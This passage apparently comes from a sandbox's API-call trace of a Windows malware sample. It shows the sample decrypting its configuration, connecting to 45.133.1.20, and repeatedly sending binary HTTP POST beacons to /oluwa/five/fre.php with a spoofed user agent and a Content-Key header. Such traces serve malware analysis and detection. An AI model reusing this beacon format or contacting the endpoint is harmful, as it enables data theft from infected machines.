(HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0158.640] recv (in: s=0x290, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0158.746] GetProcessHeap () returned 0x6a0000 [0158.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0158.748] GetProcessHeap () returned 0x6a0000 [0158.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0158.749] GetProcessHeap () returned 0x6a0000 [0158.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0158.749] GetProcessHeap () returned 0x6a0000 [0158.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0158.750] closesocket (s=0x290) returned 0 [0158.750] GetProcessHeap () returned 0x6a0000 [0158.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0158.750] GetProcessHeap () returned 0x6a0000 [0158.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0158.751] GetProcessHeap () returned 0x6a0000 [0158.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0158.751] GetProcessHeap () returned 0x6a0000 [0158.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0158.752] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x46c) returned 0x290 [0158.754] Sleep (dwMilliseconds=0xea60) [0158.756] GetProcessHeap () returned 0x6a0000 [0158.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0158.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.758] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0158.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.859] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0158.868] GetProcessHeap () returned 0x6a0000 [0158.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0158.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.869] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0158.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.870] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0158.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.871] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0158.871] GetProcessHeap () returned 0x6a0000 [0158.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0158.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.872] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0158.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.873] CryptDestroyKey (hKey=0x6ad020) returned 1 [0158.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.874] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0158.874] GetProcessHeap () returned 0x6a0000 [0158.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0158.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.876] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0158.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.924] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0158.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.926] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0158.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.927] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0158.927] GetProcessHeap () returned 0x6a0000 [0158.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0158.927] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0158.927] GetProcessHeap () returned 0x6a0000 [0158.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0158.928] GetProcessHeap () returned 0x6a0000 [0158.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0158.928] GetProcessHeap () returned 0x6a0000 [0158.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0158.929] GetProcessHeap () returned 0x6a0000 [0158.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0158.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.931] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0158.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.938] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0158.949] GetProcessHeap () returned 0x6a0000 [0158.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0158.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.950] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0158.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.951] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0158.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.952] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0158.952] GetProcessHeap () returned 0x6a0000 [0158.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0158.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.955] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0158.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.957] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0158.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0158.958] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0158.958] GetProcessHeap () returned 0x6a0000 [0158.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0158.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.959] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0158.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.960] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0158.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.961] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0158.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.962] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0158.962] GetProcessHeap () returned 0x6a0000 [0158.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0158.962] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9be0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0158.962] GetProcessHeap () returned 0x6a0000 [0158.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0158.962] socket (af=2, type=1, protocol=6) returned 0x294 [0158.962] connect (s=0x294, name=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0159.093] FreeAddrInfoW (pAddrInfo=0x6b9be0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0159.093] GetProcessHeap () returned 0x6a0000 [0159.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0159.093] GetProcessHeap () returned 0x6a0000 [0159.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0159.094] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0159.095] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0159.095] GetProcessHeap () returned 0x6a0000 [0159.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0159.095] GetProcessHeap () returned 0x6a0000 [0159.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0159.096] GetProcessHeap () returned 0x6a0000 [0159.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0159.096] GetProcessHeap () returned 0x6a0000 [0159.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0159.097] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0159.097] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0159.097] GetProcessHeap () returned 0x6a0000 [0159.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0159.097] GetProcessHeap () returned 0x6a0000 [0159.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0159.098] send (s=0x294, buf=0x6bbd20*, len=242, flags=0) returned 242 [0159.098] send (s=0x294, buf=0x6bb998*, len=159, flags=0) returned 159 [0159.099] GetProcessHeap () returned 0x6a0000 [0159.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0159.099] recv (in: s=0x294, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0159.169] GetProcessHeap () returned 0x6a0000 [0159.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0159.170] GetProcessHeap () returned 0x6a0000 [0159.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0159.171] GetProcessHeap () returned 0x6a0000 [0159.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0159.172] GetProcessHeap () returned 0x6a0000 [0159.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0159.172] closesocket (s=0x294) returned 0 [0159.172] GetProcessHeap () returned 0x6a0000 [0159.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0159.173] GetProcessHeap () returned 0x6a0000 [0159.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0159.173] GetProcessHeap () returned 0x6a0000 [0159.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0159.173] GetProcessHeap () returned 0x6a0000 [0159.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0159.174] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc30) returned 0x294 [0159.176] Sleep (dwMilliseconds=0xea60) [0159.177] GetProcessHeap () returned 0x6a0000 [0159.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0159.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.179] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0159.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.188] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0159.198] GetProcessHeap () returned 0x6a0000 [0159.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9cf8 [0159.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.199] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b9cf8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0159.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.200] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0159.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.201] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0159.201] GetProcessHeap () returned 0x6a0000 [0159.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9cf8 | out: hHeap=0x6a0000) returned 1 [0159.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.203] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0159.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.203] CryptDestroyKey (hKey=0x6ad560) returned 1 [0159.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.205] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0159.209] GetProcessHeap () returned 0x6a0000 [0159.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0159.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.210] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0159.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.211] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0159.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.212] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0159.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.213] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0159.213] GetProcessHeap () returned 0x6a0000 [0159.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0159.213] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0159.213] GetProcessHeap () returned 0x6a0000 [0159.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0159.214] GetProcessHeap () returned 0x6a0000 [0159.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0159.214] GetProcessHeap () returned 0x6a0000 [0159.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0159.214] GetProcessHeap () returned 0x6a0000 [0159.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0159.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.215] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0159.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.221] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0159.230] GetProcessHeap () returned 0x6a0000 [0159.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0159.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.232] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0159.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.233] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0159.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.234] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0159.234] GetProcessHeap () returned 0x6a0000 [0159.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0159.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.235] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0159.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.236] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0159.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0159.237] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0159.237] GetProcessHeap () returned 0x6a0000 [0159.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0159.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.242] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0159.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.245] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0159.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.247] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0159.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.249] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0159.249] GetProcessHeap () returned 0x6a0000 [0159.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0159.249] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9af0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0159.249] GetProcessHeap () returned 0x6a0000 [0159.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0159.249] socket (af=2, type=1, protocol=6) returned 0x298 [0159.249] connect (s=0x298, name=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0159.276] FreeAddrInfoW (pAddrInfo=0x6b9af0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0159.276] GetProcessHeap () returned 0x6a0000 [0159.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0159.277] GetProcessHeap () returned 0x6a0000 [0159.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0159.277] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0159.278] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0159.278] GetProcessHeap () returned 0x6a0000 [0159.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0159.279] GetProcessHeap () returned 0x6a0000 [0159.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0159.279] GetProcessHeap () returned 0x6a0000 [0159.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0159.279] GetProcessHeap () returned 0x6a0000 [0159.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0159.280] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0159.281] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0159.281] GetProcessHeap () returned 0x6a0000 [0159.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0159.281] GetProcessHeap () returned 0x6a0000 [0159.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0159.282] send (s=0x298, buf=0x6bbd20*, len=242, flags=0) returned 242 [0159.284] send (s=0x298, buf=0x6bb998*, len=159, flags=0) returned 159 [0159.284] GetProcessHeap () returned 0x6a0000 [0159.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0159.285] recv (in: s=0x298, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0159.373] GetProcessHeap () returned 0x6a0000 [0159.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0159.375] GetProcessHeap () returned 0x6a0000 [0159.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0159.375] GetProcessHeap () returned 0x6a0000 [0159.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0159.376] GetProcessHeap () returned 0x6a0000 [0159.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0159.376] closesocket (s=0x298) returned 0 [0159.378] GetProcessHeap () 